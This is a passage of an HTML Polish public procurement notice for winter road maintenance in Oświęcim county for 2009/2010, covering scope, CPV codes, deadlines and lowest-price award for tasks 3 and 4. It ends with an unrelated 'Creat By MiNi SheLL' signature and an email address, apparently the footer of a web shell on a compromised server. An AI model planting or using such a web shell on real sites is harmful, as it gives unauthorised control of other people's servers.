2.	Będą to usługi związane z likwidacją skutków zimy, żywiołu śnieżnego i skutków obniżonej temperatury w taki  sposób aby poprawić przejezdność  dróg i ograniczyć  zakłócenia ruchu drogowego wywołane czynnikami atmosferycznymi.
3.	Termin  realizacji zamówienia dla zadania Nr  3 -  w sezonie zimowym 2009/2010       -  do 15.05.2010r.      (tj. orientacyjnie: zimowe utrzymanie w okresie od 01 listopada 2009r.  do 31 marca 2010r, a dyspozycyjność do 15 kwietnia 2010r. oraz  do dnia 15 maja 2010r. wykonanie czyszczenia jezdni i studzienek ściekowych);  przy czym  sezon zimowy rozpoczyna się z chwilą  wystąpienia niekorzystnych warunków atmosferycznych  (opady śniegu  lub gołoledź) lub wezwania do robót przy zimowym utrzymaniu dróg, a zakończenie z chwilą całkowitego ustąpienia zimy. 
4.	Po zakończeniu prac zimowego utrzymania dróg   w okresie do 15 maja 2010r. zalegający przy krawędziach jezdni i wzdłuż chodników  materiał uszorstniający  musi zostać uprzątnięty, a zatkane kratki ściekowe oraz przykanaliki muszą być oczyszczone..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6, 90.21.30.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kompleksowe zimowe utrzymanie dróg powiatowych na terenie Powiatu Oświęcimskiego w sezonie 2009/2010  - Zadanie Nr 4  - teren miasta i gminy Brzeszcze na długości  30,3 km..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  świadczenie usług związanych z kompleksowym  zimowym utrzymaniem dróg powiatowych na terenie miasta i gminy Brzeszcze ( w skrócie ZUD),  a w szczególności przejęcie na siebie obowiązku utrzymania przejezdności dróg, zmniejszenia lub ograniczenia zakłóceń ruchu drogowego wywołanego czynnikami atmosferycznymi, poprzez:
   - odśnieżanie dróg- ulic przy użyciu pługów odśnieżnych,
   - likwidację śliskości zimowej, gołoledzi przy użyciu piaskarek, ewentualnie rozrzutników    rolniczych (na chodnikach), własnym materiałem: solą, mieszanką lub materiałem uszorstniającym,
               - zmagazynowanie materiałów do zwalczania  śliskości,
   - załadunek materiałów do zimowego utrzymania dróg,
   - przekazywanie informacji o stanie dróg do ZDP Oświęcim,
   - inne czynności w razie klęsk żywiołowych,
  
2.	Będą to usługi związane z likwidacją skutków zimy, żywiołu śnieżnego i skutków obniżonej temperatury w taki  sposób aby poprawić przejezdność  dróg i ograniczyć  zakłócenia ruchu drogowego wywołane czynnikami atmosferycznymi.
3.	Termin  realizacji zamówienia dla zadania Nr  4   -  w sezonie zimowym 2009/2010       -  do 15.05.2010r.      (tj. orientacyjnie: zimowe utrzymanie w okresie od 01 listopada 2009r.  do 31 marca 2010r, a dyspozycyjność do 15 kwietnia 2010r. oraz  do dnia 15 maja 2010r. wykonanie czyszczenia jezdni i studzienek ściekowych);  przy czym  sezon zimowy rozpoczyna się z chwilą  wystąpienia niekorzystnych warunków atmosferycznych  (opady śniegu  lub gołoledź) lub wezwania do robót przy zimowym utrzymaniu dróg, a zakończenie z chwilą całkowitego ustąpienia zimy. 
4.	Po zakończeniu prac zimowego utrzymania dróg   w okresie do 15 maja 2010r. zalegający przy krawędziach jezdni i wzdłuż chodników  materiał uszorstniający  musi zostać uprzątnięty, a zatkane kratki ściekowe oraz przykanaliki muszą być oczyszczone..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6, 90.21.30.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com